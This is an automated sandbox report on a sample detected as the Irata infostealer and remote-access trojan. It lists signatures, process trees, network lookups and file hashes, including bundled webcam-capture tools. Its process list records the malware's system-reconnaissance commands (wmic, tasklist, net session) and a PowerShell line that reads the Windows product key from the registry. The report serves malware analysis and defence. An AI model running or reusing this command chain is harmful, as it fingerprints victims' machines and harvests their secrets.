Malware Analysis Report

2025-01-19 05:59

Sample ID 231219-syvv1agfe9
Target PlanetsTherapy.rar
SHA256 1055ef023406f8ca401e6b652583ca67e85724519100f323f48544ea6d635353
Tags irata infostealer rat trojan persistence spyware stealer
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

1055ef023406f8ca401e6b652583ca67e85724519100f323f48544ea6d635353

Threat Level: Known bad

The file PlanetsTherapy.rar was found to be: Known bad.

Malicious Activity Summary

irata infostealer rat trojan persistence spyware stealer

Irata payload

Irata

Checks computer location settings

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Drops autorun.inf file

Unsigned PE

Enumerates physical storage devices

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Collects information from the system

Enumerates processes with tasklist

Uses Task Scheduler COM API

Creates scheduled task(s)

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-19 15:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-19 15:32

Reported

2023-12-19 15:36

Platform

win7-20231215-en

Max time kernel

6s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1120,15382437742827868295,4203629084994712479,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1680 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1680 get ExecutablePath

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1640 --field-trial-handle=1120,15382437742827868295,4203629084994712479,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1624 --field-trial-handle=1120,15382437742827868295,4203629084994712479,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp

Files


C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\es.pak

MD5 379b56e58c119db40544c7943029af29
SHA1 460e8536137f5d0d13d7d9f673eb2d185ece4382
SHA256 7beb1e9ab91e3550c20de6e5a593747cd7225b0d85491eb49d0672b5078bed6c
SHA512 87f4e538da7a78f20963b9afbd1a5739d7265a1193d87f2761710c214912d48076a134b066d365d1755467a747ffbae4ede865311c5fcb34d447e3f78135d35c

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\hi.pak

MD5 26a2f0555093a876c2335f7b27acb473
SHA1 f116546446c0330d1f70b2474c8145adf5352c4d
SHA256 b52c8df3bb2c94932d14d5c64e7f41c39631a373203490a89546f274a743820c
SHA512 5399bd0876d8c184a83480b5908ba4177fb71b1f1a98837b998d7b773a7b86ae544332f2e3c7cd3fdc168675e52b72125d5f3be53183935216ed3be17fbf6713

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\kn.pak

MD5 689efe5b30eb84415b122f5c35074640
SHA1 04f6d9527796e307512d17ed7e169bd21784fc0c
SHA256 c86cbd887eac30580f6ab54498ba344fdc06d45da941d0291879e5ef51c3ce09
SHA512 93ab28e8f240ef6274dcd871e3ab4e26805daccafabc8e27b49022e32d21c3b019ea60daf2c1fb2428eb5b3c1f1837ca4a0d2a8686e2d07832f25097aa0687c5

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ja.pak

MD5 d399d6b02afdc319b125fbb86c6d0137
SHA1 34d856491096fae03fee1473d28ccf429b9a5c67
SHA256 273a6e8b71e26cb9cf4f56b755edddb79c5cbc612f40a2872d8036f271418a89
SHA512 7c4cd4291b6ffc3eb6de13ee3431f4de1bb336cd539e4be7bf72bd5273c5ce0af07e83eb4ea8dab6ac66174f6a099f87e95e8201dc8e79e61d669e34ccf0d068

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\it.pak

MD5 2d8474cc581bb30ae3a117f0525658c1
SHA1 5baaacbda7327c19cc7b29a6fe3e3fb9bf853f25
SHA256 5c2b1730b58b9cba01320a587b0a7a7ad0e69500e7ea6bb4feebc197a6fff645
SHA512 fd70a75cac03ffc7c329414d63beda0a155f26535b1cd7d141839ade53a33361cd7d7076ced018095788f881c1076e323c8396e42cc144073e8d9946ca6aa8e8

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ml.pak

MD5 5b93ee534e6eb5e3f5ea97a03a1f0d7b
SHA1 4c91b55da1db12f058ea3b42dc565175c9576312
SHA256 3719cf9c2e67a2defc4ba95b02c5f33a0185b43e211863b052af2c04e48651b1
SHA512 9d2ccaf20a1f21bef58814de0d5788a576e952c17492295c366bb59479b1af31bd919335f6559d2825c362cb6112f4c4cf5ea491bdcfceed39670f2b0a9eba14

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\lv.pak

MD5 ae1083001d64fd1bbd710cc7c6d59f6b
SHA1 4133fbb6cd7d99064580122db2762e53333592fa
SHA256 2ed85453278a8151b4cf1d1ad16446139440443fd919aa7fed49d9df0cc1ba1f
SHA512 459382bc1f5364f80dca707983ce5f5fc1cad46be3cd3a1b576a9e64fff3aaec05eb09eabe8f9cd47fc8e444ba4115f87aae2f7078f90fa4063b2e50013bc165

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\sk.pak

MD5 855001c5a29fa632b676080cf05a74ed
SHA1 3bcf779409611e0d5ca303558477f9d70d7e42e8
SHA256 ceea21bd0970c6e3f7095bc12ab557fa17008b37a0f04894a070b7a735a898e9
SHA512 a367a562e935b82d687f02c29c78396d0cc1405caf70218d6bba57e873bfb156880e59ef69279bc2043033166ecdd2edc1149628ddc6bff908c3be3ca5059465

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ru.pak

MD5 d65e629037d84085d18f4af01867cf69
SHA1 1ecfe1efdb0ceefbc3f5eecc6a142f97fa96dd29
SHA256 4a7912869f0f4502a43f827f59f8615ab67cac7bdd338e7bbdeec71bcc3c36d2
SHA512 08ec29a9f16caf4dc6d7107464f55b95afd70e534d4a66bf3151657fc562e4d48d4640fdac63674404b5d0e2bfeacebd135df3f2b4b60e0d05c51686e22dc006

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\mr.pak

MD5 07754c8f4e209f59fd9c9871b7a66d03
SHA1 f8e5f5e85b0cfb7a0c61e94aaf9e6db2d89bcbb4
SHA256 50717969ef481666faf476532b307e42cbfd2708d2390c2959c957d0670b21cd
SHA512 926102b3fd441d628a5df3c28390bdbbb6b8a6f4b6297b5d1467b43a8e106671266e22d06c362e88d99ee0b0d61e01c8b1730ab31494a0ae1496f51bd0e4a2fb

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\zh-TW.pak

MD5 58fbd24102288613c8a7b625404df7f1
SHA1 36dab914d7b1541058730631daf6df1c7f9673f5
SHA256 389d97d3b10b75665d81894207f277c93c777ffcc52d6bfe8bd89a7502009c80
SHA512 873b0affa2fb5de03a6ff627a4e458bce54be0f86f78c064f0cc5ff45a19e3bfdc94444329caada38324bc10f83cefd466bcb289ff3244f41479ef65fc22a029

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\uk.pak

MD5 463d3f444a53d470820817a453082014
SHA1 415b41ed34c650e3e64665cad34fb6332dbf6378
SHA256 970f933cf65842f8c4f38958e07a6037b519d93e9224c61623d52a6439c6d180
SHA512 ecff8605d4124c9b41c5eba2f1988682991303630ed6478f63d60f4e4e4aaff2ed3b05df8028f3bae20b330a4a2dda246d7513a083175c37481459a70e0193d7

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\th.pak

MD5 caca36a09c639eb2e16b6ae68c291c36
SHA1 12a4cc8eb90772cd3f947d55b3bab0d31b954cd0
SHA256 86ab5980ef804fe03aeb2e5eb042536b7699c1cb369ea8102e4887f01f35a350
SHA512 c77d082d1a0d1a1c96875c09cc46e7fb4a4b35545516fab4959e3c6386dd5167fde6db21d2232d06d7f39a82309948a87bcc862cbcfbcd89991f2184b933b70f

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\te.pak

MD5 d48db998dfff750079ac6ccb6ec70a1f
SHA1 a86bb45b560fee37ac6721fc5f26bca2ffa1cfd6
SHA256 e69c01cf359804841b08a2a0fbdf9ac348f99fb17e93a94943cdd5db308d45fc
SHA512 8351f72e72a6aea965833180a40525149f8ee3df5b418f37bf95f47664a11f81da395f9a72487a123126a97d80638cd4ac1c10c9ad09324cee27e2fda9a7b277

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\ta.pak

MD5 9f86bcbab37b191cd9b518b57508542d
SHA1 29439cec42351f1276dab8a70f88fa4b1a8926a4
SHA256 cf4107dc61cd81caf219a7e9303e99252671455c3123b990831dbf636092a8fb
SHA512 57ef38c3bc2b6e7a754818dddfca80e93eef6e82031160a14a81fe269279b7efe000fb2efc060dc41d069a95131788546f5243e8bef78f3369d8661935839831

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\locales\sr.pak

MD5 c5ceff558e3015d4b7c7694c14cf0c1e
SHA1 37bb73f9239066730d2ebd16d9783b42cc126393
SHA256 16bb94cd02bb453343897efd1ee5fac3388aabe2691a755c801fab3276333ca5
SHA512 061fde1d1cbd1922f969dee18d22cae70b47c4e04335aa97be11058f3ad9f38b815ac9cf4c53e901f7ec60443052227ede0ed9c1716ac272ba730bb67a26c44d

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

